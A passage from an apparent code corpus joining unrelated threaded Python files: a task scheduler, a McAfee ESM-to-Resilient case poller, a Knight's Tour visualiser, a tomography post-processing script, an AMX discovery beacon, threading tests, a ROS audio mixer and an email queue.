target=self._run_task,
kwargs={
'schedule': schedule,
'fun': fun
},
daemon=True)
self.running_tasks.append(thread)
thread.start()
def _schedule_task(self, schedule: _Schedule, fun: Callable[[],
None]) -> None:
if self.exit.is_set():
return
now = self._get_utc_time()
next_run_time = schedule.next(now)
log.debug(
f'Scheduling job {fun.__name__} to be run at {datetime.datetime.utcfromtimestamp(next_run_time)}'
)
self.scheduler.enterabs(
next_run_time,
1,
self._schedule_handler,
kwargs={
'schedule': schedule,
'fun': fun
})
def schedule(self, timespec: str, f: Callable[[], None]) -> None:
if not timespec:
log.debug(f'Task {f} is is ignored as the timespec is empty')
return
self._schedule_task(_Schedule.from_str(timespec), f)
def _get_thread_id(self, t):
# returns id of the respective thread
if hasattr(t, '_thread_id'):
return t._thread_id
for id, thread in threading._active.items():
if thread is t:
return id
raise RuntimeError('not found')
@on_shutdown()
def handle_shutdown(self) -> None:
log.info('Shutting down scheduler')
self.exit.set()
with self.scheduler._lock:
for e in self.scheduler.queue:
self.scheduler.cancel(e)
log.info('Cancelled all jobs in job queue')
# Stop running jobs.
for t in self.running_tasks:
log.info(f'Sending finish signal to running {t.name}')
res = ctypes.pythonapi.PyThreadState_SetAsyncExc(
ctypes.c_long(self._get_thread_id(t)),
ctypes.py_object(_SignalFinish))
if res == 0:
log.error('Invalid thread id')
elif res != 1:
ctypes.pythonapi.PyThreadState_SetAsyncExc(
ctypes.c_long(self._get_thread_id(t)), 0)
log.error('Sending finish signal to thread failed')
for t in self.running_tasks:
log.info(f'Waiting 60 seconds for {t.name} to finish')
t.join(timeout=60)
if t.is_alive():
log.error('Job did not finish after 60 second timeout. Forcing stop...')
log.info('Finished scheduler shutdown')
def _has_work(self):
return len(self.running_tasks) > 0 or not self.scheduler.empty()
def _run_scheduler(self):
while not self.exit.is_set() and self._has_work():
self.scheduler.run()
@execute(order=float('inf'))
def run_scheduler(self) -> Thread:
thread = Thread(name='Scheduler', target=self._run_scheduler)
thread.start()
log.info(f'Started scheduler in thread {thread.name}')
return thread
|
mcafee_esm_case_polling.py
|
# -*- coding: utf-8 -*-
# pragma pylint: disable=unused-argument, no-self-use
# (c) Copyright IBM Corp. 2010, 2018. All Rights Reserved.
"""Polling implementation"""
import logging
import time
import json
import calendar
import jinja2
from datetime import datetime
from threading import Thread
from os.path import join, pardir, os
from resilient_circuits import ResilientComponent, handler
from fn_mcafee_esm.util.helper import check_config, get_authenticated_headers
from fn_mcafee_esm.components.mcafee_esm_get_list_of_cases import case_get_case_list
from fn_mcafee_esm.components.mcafee_esm_get_case_detail import case_get_case_detail
from resilient_circuits.template_functions import environment
from resilient import SimpleHTTPException
import resilient_circuits.template_functions as template_functions
log = logging.getLogger(__name__)
ESM_CASE_FIELD_NAME = "mcafee_esm_case_id"
class ESM_CasePolling(ResilientComponent):
"""Component that implements Resilient function 'mcafee_esm_edit_case"""
def __init__(self, opts):
"""constructor provides access to the configuration options"""
super(ESM_CasePolling, self).__init__(opts)
self.options = opts.get("fn_mcafee_esm", {})
# Check config file and change trust_cert to Boolean
self.options = check_config(self.options)
self.main()
@handler("reload")
def _reload(self, event, opts):
"""Configuration options have changed, save new values"""
self.options = opts.get("fn_mcafee_esm", {})
def main(self):
options = self.options
if int(options.get("esm_polling_interval", 0)) > 0:
# Add ds_to_millis to global for use in filters
ds_filter = {"ds_to_millis": ds_to_millis}
env = environment()
env.globals.update(ds_filter)
# Create and start polling thread
thread = Thread(target=self.esm_polling_thread)
thread.daemon = True
thread.start()
log.info("Polling for cases in ESM is occurring")
else:
log.info("Polling for cases in ESM is not occurring")
def esm_polling_thread(self):
while True:
case_list = case_get_case_list(self.options)
headers = get_authenticated_headers(self.options["esm_url"], self.options["esm_username"],
self.options["esm_password"], self.options["trust_cert"])
# Check cases in incidents
for case in case_list:
# If case is not currently an incident create one
if len(self._find_resilient_incident_for_req(case["id"])) == 0:
incident_payload = self.build_incident_dto(headers, case["id"])
self.create_incident(incident_payload)
# Amount of time (seconds) to wait to check cases again, defaults to 10 mins if not set
time.sleep(int(self.options.get("esm_polling_interval", 600)))
def build_incident_dto(self, headers, case_id):
current_path = os.path.dirname(os.path.realpath(__file__))
default_temp_file = join(current_path, pardir, "data/templates/esm_incident_mapping.jinja")
template_file = self.options.get("incident_template", default_temp_file)
try:
with open(template_file, 'r') as template:
log.debug("Reading template file")
case_details = case_get_case_detail(self.options, headers, case_id)
log.debug("Case details in dict form: {}".format(case_details))
incident_template = template.read()
return template_functions.render(incident_template, case_details)
except jinja2.exceptions.TemplateSyntaxError:
log.info("'incident_template' is not set correctly in config file.")
def create_incident(self, payload):
try:
resilient_client = self.rest_client()
uri = "/incidents"
payload_dict = json.loads(payload)
log.info("Creating incident with payload: {}".format(payload))
log.debug("Payload: {}".format(payload_dict))
response = resilient_client.post(uri=uri, payload=payload_dict)
return response
except SimpleHTTPException:
log.info("Something went wrong when attempting to create the Incident")
# Returns back list of incidents if there is one with the same case ID, else returns empty list
def _find_resilient_incident_for_req(self, esm_case_id):
r_incidents = []
query_uri = "/incidents/query?return_level=partial"
query = {
'filters': [{
'conditions': [
{
'field_name': 'properties.{}'.format(ESM_CASE_FIELD_NAME),
'method': 'equals',
'value': esm_case_id
},
{
'field_name': 'plan_status',
'method': 'equals',
'value': 'A'
}
]
}],
"sorts": [{
"field_name": "create_date",
"type": "desc"
}]
}
try:
r_incidents = self.rest_client().post(query_uri, query)
except SimpleHTTPException:
# Some versions of Resilient 30.2 onward have a bug that prevents query for numeric fields.
# To work around this issue, let's try a different query, and filter the results. (Expensive!)
query_uri = "/incidents/query?return_level=normal&field_handle={}".format(ESM_CASE_FIELD_NAME)
query = {
'filters': [{
'conditions': [
{
'field_name': 'properties.{}'.format(ESM_CASE_FIELD_NAME),
'method': 'has_a_value'
},
{
'field_name': 'plan_status',
'method': 'equals',
'value': 'A'
}
]
}]
}
r_incidents_tmp = self.rest_client().post(query_uri, query)
r_incidents = [r_inc for r_inc in r_incidents_tmp
if r_inc["properties"].get(ESM_CASE_FIELD_NAME) == esm_case_id]
return r_incidents
# Converts string datetime to milliseconds epoch
def ds_to_millis(val):
"""Assuming val is a string datetime, e.g. '05/17/2017 17:07:59' (GMT), convert to milliseconds epoch"""
if not val:
return val
try:
if len(val) != 19:
raise ValueError("Invalid timestamp length %s" % val)
ts_format = "%m/%d/%Y %H:%M:%S"
dt = datetime.strptime(val, ts_format)
return calendar.timegm(dt.utctimetuple()) * 1000
except Exception as e:
log.exception("%s Not in expected timestamp format MM/DD/YYY HH:MM:SS", val)
return None
|
Knight_Tour.py
|
import pygame
from heapq import *
import random
import time
import ExtraWidgits
import ExtraWidgits_for_Pathfinders
from threading import *
import StartProcess
import Knight_Tour
RunClock=True
class Knight():
def __init__(self, v, speed):
self.n = v
self.cb = [[0 for x in range(v)] for y in range(v)]
self.ans = []
self.speed = speed
self.WaitForEndProcess=True
self.operations=0
self.running=True
pygame.init()
self.SIDE = 600
self.block = self.SIDE // self.n
self.win = pygame.display.set_mode((self.SIDE+450, self.SIDE))
self.K_SIDE = (self.block * 3) // 4
self.knight_img = pygame.image.load('Images/knight2.png')
self.knight_img = pygame.transform.scale(self.knight_img, (self.K_SIDE, self.K_SIDE))
self.WHITE = (255, 255, 255)
self.BLACK = (0, 0, 0)
self.RED = (255, 0, 0)
pygame.display.set_caption("KNIGHT'S TOUR")
self.x = self.block // 2
self.y = self.block // 2
self.x1 = (self.block - self.K_SIDE) // 2
self.line_w = -int(-70 // self.n)
self.StartVisualization()
def StartVisualization(self):
self.grid()
AddClock = ExtraWidgits.Clock(self.win, 850, 100, 25)
AddClock.start()
AddExitText = ExtraWidgits.ExitText(self.win,725,250)
AddExitText.start()
AddMainMenuButton = ExtraWidgits_for_Pathfinders.MainMenuButton(self.win,700,300)
AddMainMenuButton.start()
StartSolving=Thread(target=self.solve)
StartSolving.start()
self.CheckActions()
def CheckActions(self):
self.X = 700
self.Y = 300
while (self.running):
try:
self.pos = pygame.mouse.get_pos()
except:
pass
for event in pygame.event.get():
if event.type==pygame.QUIT:
self.running=False
pygame.quit()
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
self.running = False
pygame.quit()
if self.pos[0] > self.X and self.pos[0] < self.X + 240 and self.pos[1] > self.Y and self.pos[
1] < self.Y + 35:
if event.type == pygame.MOUSEBUTTONDOWN:
try:
self.running=False
pygame.quit()
while(self.WaitForEndProcess):
pass
Process = StartProcess.START()
Process.start()
Knight_Tour.RunClock=True
except:
pass
def grid(self):
for i in range(self.n):
for j in range(self.n):
if not self.running:
break
if ((i + j) % 2 == 0):
color = self.WHITE
else:
color = self.BLACK
pygame.draw.rect(self.win, color, (i * self.block, j * self.block, self.block, self.block))
if ([i, j] in self.ans):
color = (0, 180, 0)
pygame.draw.rect(self.win, (120, 255, 0),
(self.x1 + i * self.block, self.x1 + j * self.block, self.K_SIDE, self.K_SIDE))
def show(self):
self.grid()
xx, yy = self.ans[0]
for i in range(1, len(self.ans)):
if not self.running:
break
tx, ty = self.ans[i]
pygame.draw.line(self.win, (255, 0, 0), (self.x + xx * self.block, self.x + yy * self.block),
(self.x + tx * self.block, self.x + ty * self.block), self.line_w)
xx, yy = self.ans[i]
self.win.blit(self.knight_img, (self.x1 + xx * self.block, self.x1 + yy * self.block))
update_display=pygame.Rect(0,0,self.SIDE,self.SIDE)
pygame.display.update(update_display)
def solve(self):
kx = random.randint(0, self.n - 1)
ky = random.randint(0, self.n - 1)
dx = [-2, -1, 1, 2, -2, -1, 1, 2]
dy = [1, 2, 2, 1, -1, -2, -2, -1]
for k in range(self.n ** 2):
if not self.running:
break
self.operations+=1
self.cb[ky][kx] = k + 1
self.ans.append([kx, ky])
self.show()
if not self.running:
break
time.sleep(1/self.speed)
pq = []
for i in range(8):
self.operations+=1
if not self.running:
break
nx = kx + dx[i]
ny = ky + dy[i]
if 0 <= nx < self.n and 0 <= ny < self.n:
if self.cb[ny][nx] == 0:
ctr = 0
for j in range(8):
self.operations+=1
if not self.running:
break
ex = nx + dx[j]
ey = ny + dy[j]
if 0 <= ex < self.n and 0 <= ey < self.n:
if self.cb[ey][ex] == 0: ctr += 1
heappush(pq, (ctr, i))
if len(pq) > 0:
(p, m) = heappop(pq)
kx += dx[m]
ky += dy[m]
else:
break
if self.running:
ExtraWidgits.OperationsDoneKnight(self.operations, self.win, 700, 400, "Knight's Tour Completed.")
Knight_Tour.RunClock=False
self.WaitForEndProcess=False
return True
|
post_rec_particles.py
|
"""
Script for post-processing already reconstructed particles
Input: - STAR file with next columns:
'_rlnMicrographName': tomogram that will be used for reconstruction
'_rlnImageName': tomograms used for picking
'_rlnCtfImage': (optional) CTF model subvolume
'_psSegImage': (optional) mask for particles within the reconstructed tomograms
'_rlnCoordinate{X,Y,Z}': {X,Y,Z} coordinates in Relion format
'_rlnAngle{Rot,Tilt,Psi}': (optional) {Rot,Tilt,Psi} angles
- Output paths
- Post-processing settings
Output: - Particles sub-volumes are post-processed and restored
- A new STAR file
"""
__author__ = 'Antonio Martinez-Sanchez'
# ################ Package import
import gc
import os
import sys
import time
import copy
import pyto
import random
import pyseg as ps
import numpy as np
import multiprocessing as mp
from pyseg.globals import tomo_shift, get_sub_copy
from pyseg import sub, pexceptions
########## Global variables
ANGLE_NAMES = ['Rot', 'Tilt', 'Psi']
########################################################################################
# PARAMETERS
########################################################################################
####### Input data
ROOT_PATH = '/fs/pool/pool-lucic2/antonio/workspace/psd_an/ex/syn2'
# Input STAR file
in_star = ROOT_PATH + '/org/pst/ltomos/ltomos_all_pst_subclean/7_parts.star' # '/rln/ref_model/run3_c1_LB_mb_data_prior.star' # '/rln/pst/class_blob_h_v6/run17_c1_it050_data_c1_prior_clean.star' # '/rln/pre/root_v5_rot_rnd_prior.star'
in_mask = ROOT_PATH + '/masks/mask_cyl_64_35_48_15_r.mrc' # '/masks/mask_cyl_64_34_50_12.mrc' # '/masks/mask_cyl_64_35_52_10_r.mrc' # '/masks/mask_cyl_64_15_50_15.mrc'
####### Output data
out_part_dir = ROOT_PATH + '/rec/pst/particles_lab_c2_v6_nomb_post' # '/rec/col/LB_cyto' # '/rec/pst/particles_blob_ha_v6_nomb_post'
out_star = ROOT_PATH + '/rec/pst/particles_lab_c2_v6_nomb_post.star' # '/rec/col/LB_cyto_post.star' # '/rec/pst/blob_ha_class_run17_nomb_post.star'
####### Particles pre-processing settings
do_ang_prior = ['Tilt', 'Psi', 'Rot'] # ['Rot', 'Tilt', 'Psi']
do_ang_rnd = [] # ['Rot']
####### Multiprocessing settings
mp_npr = 1 # 10
########################################################################################
# Local functions
########################################################################################
class Settings(object):
out_part_dir = None
out_star = None
do_ang_prior = None
do_ang_rnd = None
in_mask = None
def pr_worker(pr_id, star, sh_star, rows, settings, qu):
"""
Function which implements the functionality for the paralled workers.
Each worker process a pre-splited set of rows of Star object
:param pr_id: process ID
:param star: Star object with input information
:param rln_star: shared output Star object
:param rows: list with Star rows to process for the worker
:param settings: object with the settings
:param qu: queue to store the output Star object
:return: stored the reconstructed tomograms and insert the corresponding entries in the
input Star object
"""
# Initialization
out_part_dir = settings.out_part_dir
do_ang_prior = settings.do_ang_prior
do_ang_rnd = settings.do_ang_rnd
in_mask = settings.in_mask
rln_star = copy.deepcopy(sh_star)
mask = ps.disperse_io.load_tomo(in_mask, mmap=False)
# print '\tLoop for particles: '
count, n_rows = 0, len(rows)
for row in rows:
# print '\t\t\t+Reading the entry...'
in_pick_tomo = star.get_element('_rlnImageName', row)
in_rec_tomo = star.get_element('_rlnMicrographName', row)
in_ctf = star.get_element('_rlnCtfImage', row)
x_pick = star.get_element('_rlnCoordinateX', row)
y_pick = star.get_element('_rlnCoordinateY', row)
z_pick = star.get_element('_rlnCoordinateZ', row)
try:
shift_x = star.get_element('_rlnOriginX', row)
except KeyError:
shift_x = 0
try:
shift_y = star.get_element('_rlnOriginY', row)
except KeyError:
shift_y = 0
try:
shift_z = star.get_element('_rlnOriginZ', row)
except KeyError:
shift_z = 0
rot = star.get_element('_rlnAngleRot', row)
tilt = star.get_element('_rlnAngleTilt', row)
psi = star.get_element('_rlnAnglePsi', row)
rot_prior, tilt_prior, psi_prior = None, None, None
if ANGLE_NAMES[0] in do_ang_prior:
rot_prior = rot
if ANGLE_NAMES[0] in do_ang_rnd:
rot = 180. * random.random()
if ANGLE_NAMES[1] in do_ang_prior:
tilt_prior = tilt
if ANGLE_NAMES[1] in do_ang_rnd:
tilt = 180. * random.random()
if ANGLE_NAMES[2] in do_ang_prior:
psi_prior = psi
if ANGLE_NAMES[2] in do_ang_rnd:
psi = 180. * random.random()
angs = np.asarray((rot, tilt, psi), dtype=np.float)
# Sub-volumes post-processing
svol = ps.disperse_io.load_tomo(in_pick_tomo, mmap=False)
r3d = pyto.geometry.Rigid3D()
r3d.q = r3d.make_r_euler(angles=np.radians(angs), mode='zyz_in_active')
if (shift_x != 0) or (shift_y != 0) or (shift_z != 0):
svol = tomo_shift(svol, (shift_y, shift_x, shift_z))
svol_sp = np.asarray(svol.shape, dtype=np.int)
svol_cent = np.asarray((int(.5 * svol_sp[0]), int(.5 * svol_sp[1]), int(.5 * svol_sp[2])), dtype=np.float32)
svol = r3d.transformArray(svol, origin=svol_cent, order=3, prefilter=True)
stat_vol = svol[mask > 0]
mn, st = stat_vol.mean(), stat_vol.std()
if st > 0:
svol = (svol - mn) / st
svol = ps.globals.randomize_voxel_mask(svol, mask, ref='fg')
r3d_inv = pyto.geometry.Rigid3D()
r3d_inv.q = r3d.make_r_euler(angles=np.radians(angs), mode='zyz_in_passive')
svol = r3d_inv.transformArray(svol, origin=svol_cent, order=3, prefilter=True)
if (shift_x != 0) or (shift_y != 0) or (shift_z != 0):
svol = tomo_shift(svol, (-shift_y, -shift_x, -shift_z))
# Adding entry to particles STAR file
out_part = out_part_dir + '/' + os.path.splitext(os.path.split(in_pick_tomo)[1])[0] + '.mrc'
ps.disperse_io.save_numpy(svol, out_part)
# Writing in the shared object
print('\t\t-Process[' + str(pr_id) + '], Particle [' + str(count) + '/' + str(n_rows) + ']: ' + out_part)
part_row = {'_rlnMicrographName': in_rec_tomo,
'_rlnCtfImage': in_ctf,
'_rlnImageName': out_part,
'_rlnCoordinateX': x_pick,
'_rlnCoordinateY': y_pick,
'_rlnCoordinateZ': z_pick,
'_rlnOriginX': shift_x,
'_rlnOriginY': shift_y,
'_rlnOriginZ': shift_z}
part_row['_rlnAngleRot'] = rot
part_row['_rlnAngleTilt'] = tilt
part_row['_rlnAnglePsi'] = psi
if ANGLE_NAMES[0] in do_ang_prior:
part_row['_rlnAngleRotPrior'] = rot_prior
if ANGLE_NAMES[1] in do_ang_prior:
part_row['_rlnAngleTiltPrior'] = tilt_prior
if ANGLE_NAMES[2] in do_ang_prior:
part_row['_rlnAnglePsiPrior'] = psi_prior
rln_star.add_row(**part_row)
count += 1
# Finishing the process
qu.put(rln_star)
sys.exit(pr_id)
########################################################################################
# MAIN ROUTINE
########################################################################################
# Print initial message
print('Extracting transmembrane features.')
print('\tAuthor: ' + __author__)
print('\tDate: ' + time.strftime("%c") + '\n')
print('Options:')
print('\tInput STAR file: ' + in_star)
print('\tInput mask: ' + in_mask)
print('\tOutput directory for reconstructed particles: ' + out_part_dir)
print('\tOutput STAR file: ' + out_star)
print('\tParticles pre-processing settings: ')
if len(do_ang_prior) > 0:
for ang_prior in do_ang_prior:
if ang_prior not in ['Rot', 'Tilt', 'Psi']:
print('ERROR: unrecognized angle: ' + ang_prior)
print('Unsuccessfully terminated. (' + time.strftime("%c") + ')')
sys.exit(-1)
print('\t\t-Adding prior for angles: ' + ang_prior)
if len(do_ang_rnd) > 0:
for ang_rnd in do_ang_rnd:
if ang_rnd not in ['Rot', 'Tilt', 'Psi']:
print('ERROR: unrecognized angle: ' + ang_rnd)
print('Unsuccessfully terminated. (' + time.strftime("%c") + ')')
sys.exit(-1)
print('\t\t-Setting random values for angles: ' + ang_rnd)
print('\tMultiprocessing settings: ')
print('\t\t-Number processes: ' + str(mp_npr))
print('')
print('Loading input STAR file...')
star, rln_star = sub.Star(), sub.Star()
try:
star.load(in_star)
except pexceptions.PySegInputError as e:
print('ERROR: input STAR file could not be loaded because of "' + e.get_message() + '"')
print('Terminated. (' + time.strftime("%c") + ')')
sys.exit(-1)
if not os.path.exists(out_part_dir):
os.makedirs(out_part_dir)
print('\tInitializing output Relion STAR file: ')
rln_star.add_column(key='_rlnMicrographName')
rln_star.add_column(key='_rlnCtfImage')
rln_star.add_column(key='_rlnImageName')
rln_star.add_column(key='_rlnCoordinateX')
rln_star.add_column(key='_rlnCoordinateY')
rln_star.add_column(key='_rlnCoordinateZ')
rln_star.add_column(key='_rlnOriginX')
rln_star.add_column(key='_rlnOriginY')
rln_star.add_column(key='_rlnOriginZ')
if ANGLE_NAMES[0] in do_ang_prior:
if star.has_column(key='_rlnAngleRot'):
rln_star.add_column(key='_rlnAngleRot')
rln_star.add_column(key='_rlnAngleRotPrior')
else:
print('ERROR: Prior Rot angle cannot be added since not Rot angle in the input tomogram.')
print('Unsuccessfully terminated. (' + time.strftime("%c") + ')')
sys.exit(-1)
if ANGLE_NAMES[1] in do_ang_prior:
if star.has_column(key='_rlnAngleTilt'):
rln_star.add_column(key='_rlnAngleTilt')
rln_star.add_column(key='_rlnAngleTiltPrior')
else:
print('ERROR: Prior Tilt angle cannot be added since not Tilt angle in the input tomogram.')
print('Unsuccessfully terminated. (' + time.strftime("%c") + ')')
sys.exit(-1)
if ANGLE_NAMES[2] in do_ang_prior:
if star.has_column(key='_rlnAnglePsi'):
rln_star.add_column(key='_rlnAnglePsi')
rln_star.add_column(key='_rlnAnglePsiPrior')
else:
print('ERROR: Prior Psi angle cannot be added since not Psi angle in the input tomogram.')
print('Unsuccessfully terminated. (' + time.strftime("%c") + ')')
sys.exit(-1)
if ANGLE_NAMES[0] in do_ang_rnd:
if not rln_star.has_column(key='_rlnAngleRot'):
rln_star.add_column(key='_rlnAngleRot')
if ANGLE_NAMES[1] in do_ang_rnd:
if not rln_star.has_column(key='_rlnAngleTilt'):
rln_star.add_column(key='_rlnAngleTilt')
if ANGLE_NAMES[2] in do_ang_rnd:
if not rln_star.has_column(key='_rlnAnglePsi'):
rln_star.add_column(key='_rlnAnglePsi')
print('\tInitializing multiprocessing with ' + str(mp_npr) + ' processes: ')
settings = Settings()
settings.out_part_dir = out_part_dir
settings.out_star = out_star
settings.in_mask = in_mask
settings.do_ang_prior = do_ang_prior
settings.do_ang_rnd = do_ang_rnd
processes = list()
qu = mp.Queue()
spl_ids = np.array_split(list(range(star.get_nrows())), mp_npr)
# Starting the processes
for pr_id in range(mp_npr):
pr = mp.Process(target=pr_worker, args=(pr_id, star, rln_star, spl_ids[pr_id], settings, qu))
pr.start()
processes.append(pr)
# Getting processes results
pr_results, stars = list(), list()
for pr in processes:
stars.append(qu.get())
for pr_id, pr in enumerate(processes):
pr.join()
pr_results.append(pr.exitcode)
if pr_id != pr_results[pr_id]:
print('ERROR: Process ' + str(pr_id) + ' ended incorrectly.')
print('Unsuccessfully terminated. (' + time.strftime("%c") + ')')
sys.exit(-1)
gc.collect()
# Merging output STAR files
rln_merged_star = sub.Star()
keys = stars[0].get_column_keys()
for key in keys:
rln_merged_star.add_column(key)
for star in stars:
for row in range(star.get_nrows()):
hold_row = dict()
for key in keys:
hold_row[key] = star.get_element(key, row)
rln_merged_star.add_row(**hold_row)
print('\tStoring output STAR file in: ' + out_star)
rln_merged_star.store(out_star)
print('Successfully terminated. (' + time.strftime("%c") + ')')
|
beacon.py
|
import logging
import os
import re
import uuid
import time
import threading
import socket
import util
log = logging.getLogger(__name__)
MULTICAST_PORT = 9131
MULTICAST_IP = '239.255.250.250'
MULTICAST_TTL = int(os.getenv('IP2SL_BEACON_HOPS', 2)) # after TWO network hops the beacon packet should be discarded
# Implements a version of the AMX Beacon device discovery protocol with periodic heartbeats
class AMXDiscoveryBeacon():
def __init__(self, config):
self._config = config
# heartbeat interval in seconds (default is every 10 seconds); ENV override for testing
self._beacon_interval = max(1, int(os.getenv('IP2SL_BEACON_INTERVAL', '10')))
self._console_host = util.get_host(config)
self._console_port = int(os.getenv('IP2SL_CONSOLE_PORT', 4444))
self._thread = threading.Thread(target=self.heartbeat, args=())
self._thread.daemon = True
self._thread.start()
def get_mac(self):
return ''.join(re.findall('..', '%012x' % uuid.getnode())).upper()
def heartbeat(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, MULTICAST_TTL)
# iTach Flex discovery beacon is a AMX-styles multicast UDP packet sent to IP 239.255.250.250, port 9131.
data = {
'UUID' : f"VirtualIP2SL_{self.get_mac()}", # required; unique identifer for this instance
'SDKClass' : 'Utility', # required
'Make' : 'GlobalCache', # required
'Model' : 'iTachFlexEthernet', # required; note GC-100-12 for legacy model, or iTachIP2SL for v1.5 API
# 'Config-URL' : f"http://{self._console_host}:{self._console_port}",
'Revision' : '710-3000-18',
'Pkg_Level' : '', # "GCPK001",
'PCB_PN' : '025-0034-12',
'Status' : 'Ready'
}
heartbeat_packet = "AMXB" + ''.join(F"<-{k}={v}>" for (k,v) in data.items())
while True:
log.debug(f"Broadcasting heartbeat beacon to {MULTICAST_IP}:{MULTICAST_PORT}: {heartbeat_packet}")
heartbeat_packet += "\r"
sock.sendto(heartbeat_packet.encode(), (MULTICAST_IP, MULTICAST_PORT))
time.sleep(self._beacon_interval)
|
test_thread.py
|
import contextvars
import operator
import threading
import time
import pytest
from threadlet import Future, TimeoutError
from threadlet.thread import Thread
from threadlet.utils import FuturedFunc
NUMBERS = [1, 2]
EXPECTED_RES = sum(NUMBERS)
ctx_var: contextvars.ContextVar = contextvars.ContextVar("ctx_var")
def test_thread_submit_success0():
t = Thread(target=sum, args=(NUMBERS,))
t.start()
try:
assert t.future.result(1) == EXPECTED_RES
finally:
t.join()
with pytest.raises(AttributeError):
t.future.result(1)
assert threading.active_count() == 1
def test_thread_submit_success1():
with Thread(target=sum, args=(NUMBERS,)) as t:
assert t.future.result(1) == EXPECTED_RES
assert threading.active_count() == 1
def test_thread_submit_success2():
with Thread.submit(sum, NUMBERS) as t:
assert t.future.result(1) == EXPECTED_RES
assert threading.active_count() == 1
def test_thread_submit_no_future():
with Thread.submit(time.sleep, 1):
assert threading.active_count() == 2
assert threading.active_count() == 1
def test_thread_submit_error():
numbers = [1, 0]
with Thread.submit(operator.truediv, *numbers) as t:
with pytest.raises(ZeroDivisionError):
t.future.result(1)
assert threading.active_count() == 1
def test_thread_submit_timeout():
with Thread.submit(time.sleep, 2) as t:
with pytest.raises(TimeoutError):
t.future.result(timeout=1)
assert t.future.result(2) is None
assert threading.active_count() == 1
def test_contextvar_success():
x = 1
ctx_var.set(x)
with Thread.submit(target=ctx_var.get) as t:
assert t.future.result(1) == x
def test_contextvar_error():
f = Future()
ctx_var.set(1)
t = threading.Thread(target=FuturedFunc(f, ctx_var.get))
t.start()
with pytest.raises(LookupError):
f.result(1)
del f
t.join(1)
assert not t.is_alive()
|
opentera_webrtc_audio_mixer.py
|
#!/usr/bin/env python3
# PYTHONPATH is set properly when loading a workspace.
# This package needs to be installed first.
import pyaudio
import numpy
import threading
from datetime import datetime, timedelta
import queue
# ROS
import rospy
from opentera_webrtc_ros_msgs.msg import PeerAudio
p = pyaudio.PyAudio()
output_device_index = 0
class AudioWriter:
def __init__(self, peer_id: str):
self._peer_id = peer_id
self._audio_queue = queue.Queue()
self._quit_event = threading.Event()
self._thread = threading.Thread(target=self._run)
self._lastPushTime = datetime.now()
def get_last_push(self):
return self._lastPushTime
def push_audio(self, audio: PeerAudio, timeout=None):
self._audio_queue.put(audio, timeout=timeout)
# print('PUSH', datetime.now().timestamp(), self._audio_queue.qsize())
self._lastPushTime = datetime.now()
def pull_audio(self, timeout=None):
audio = self._audio_queue.get(timeout=timeout)
# print('PULL', datetime.now().timestamp(), self._audio_queue.qsize())
return audio
def _run(self):
print('Thread_run', self._peer_id)
stream = None
while not self._quit_event.isSet():
try:
# Write data (should get 10ms frames)
audio = self.pull_audio(timeout=0.010)
if audio:
if audio.frame.format == 'signed_16':
if stream is None:
stream = p.open(format=pyaudio.paInt16,
channels=audio.frame.channel_count,
rate=audio.frame.sampling_frequency,
output_device_index=output_device_index,
frames_per_buffer=int(audio.frame.frame_sample_count * 20),
output=True)
# Fill buffer with zeros ?
# for _ in range(10):
# stream.write(numpy.zeros(audio.frame.frame_sample_count, dtype=numpy.int16))
stream.write(audio.frame.data)
else:
print('Unsupported format: ', audio.frame.format, self._peer_id)
except queue.Empty as e:
# An exception will occur when queue is empty
pass
if stream:
stream.close()
print('Thread done!', self._peer_id)
def start(self):
self._quit_event.clear()
self._thread.start()
def stop(self):
if self._thread.is_alive():
self._quit_event.set()
print('Waiting for thread', self._peer_id)
self._thread.join()
class AudioMixerROS:
def __init__(self):
self._subscriber = rospy.Subscriber('/webrtc_audio', PeerAudio, self._on_peer_audio, queue_size=100)
self._writers = dict()
# Cleanup timer every second
self._timer = rospy.Timer(rospy.Duration(1), self._on_cleanup_timeout)
def shutdown(self):
self._timer.shutdown()
for writer in self._writers:
print('stopping writer', writer)
self._writers[writer].stop()
def _on_cleanup_timeout(self, event):
# Cleanup old threads ...
peers_to_delete = []
# Store since we cannot remove while iterating
for peer_id in self._writers:
if self._writers[peer_id].get_last_push() + timedelta(seconds=15) < datetime.now():
peers_to_delete.append(peer_id)
# Remove old peers
for peer in peers_to_delete:
self._writers[peer].stop()
del self._writers[peer]
def _on_peer_audio(self, audio: PeerAudio):
peer_id = audio.sender.id
if peer_id not in self._writers:
# Create new writer thread
writer = AudioWriter(peer_id)
self._writers[peer_id] = writer
# Start thread
writer.start()
# Push audio
self._writers[peer_id].push_audio(audio)
if __name__ == '__main__':
for index in range(p.get_device_count()):
info = p.get_device_info_by_index(index)
if info['name'] == 'default':
output_device_index = info['index']
# Init ROS
rospy.init_node('opentera_webrtc_audio_mixer', anonymous=True)
mixer = AudioMixerROS()
rospy.spin()
mixer.shutdown()
|
email.py
|
import logging
import urllib
from textwrap import dedent
from mailer import Mailer, Message
from retrying import retry
from dart.model.exception import DartEmailException
from dart.context.locator import injectable
from dart.util.config import _get_dart_host
from Queue import Queue
from threading import Thread
_logger = logging.getLogger(__name__)
@injectable
class Emailer(object):
def __init__(self, dart_config):
email_config = dart_config['email']
self._env_name = dart_config['dart']['env_name'].upper()
self._mailer = Mailer(**email_config['mailer'])
self._from = email_config['from']
self._cc_on_error = email_config['cc_on_error']
self._debug = email_config.get('debug', False)
self._suppress_send = email_config.get('suppress_send', False)
self._dart_host = _get_dart_host(dart_config)
# We have one mailer being used in trigger_listener
self._email_queue = Queue(maxsize=1000) # we should not have that many emails pending to be sent
email_worker = Thread(target=self.send_queued_email_runner, args=(self._email_queue,))
email_worker.setDaemon(True) # we run in a container, when it exits this thread will exit too.
email_worker.start()
def get_entity_link(self, entity, action_id):
origin_param = '["id=%s"]' %(action_id)
converted_param = urllib.quote(origin_param, safe='')
path = 'https://%s/#/entities/%s?f=' % (self._dart_host, entity)
return path + converted_param
def get_workflow_manager_link(self, workflow_id):
return 'https://%s/#/managers/workflow?id=%s&t=wf' % (self._dart_host, workflow_id)
@staticmethod
@retry(wait_fixed=10000, stop_max_attempt_number=12)
# we experience occasional gmail API issues, so we will retry a few times
def send_queued_email(args):
msg = args.get('msg')
_logger.info("Mailer Thread: message= {to}, {subject}, {body}".format(to=msg.To, subject=msg.Subject, body=msg.Body))
args.get('mail_sender', lambda(x,y): None)(msg, args.get('debug'))
@staticmethod
def send_queued_email_runner(q):
while True:
args = q.get()
try:
Emailer.send_queued_email(args)
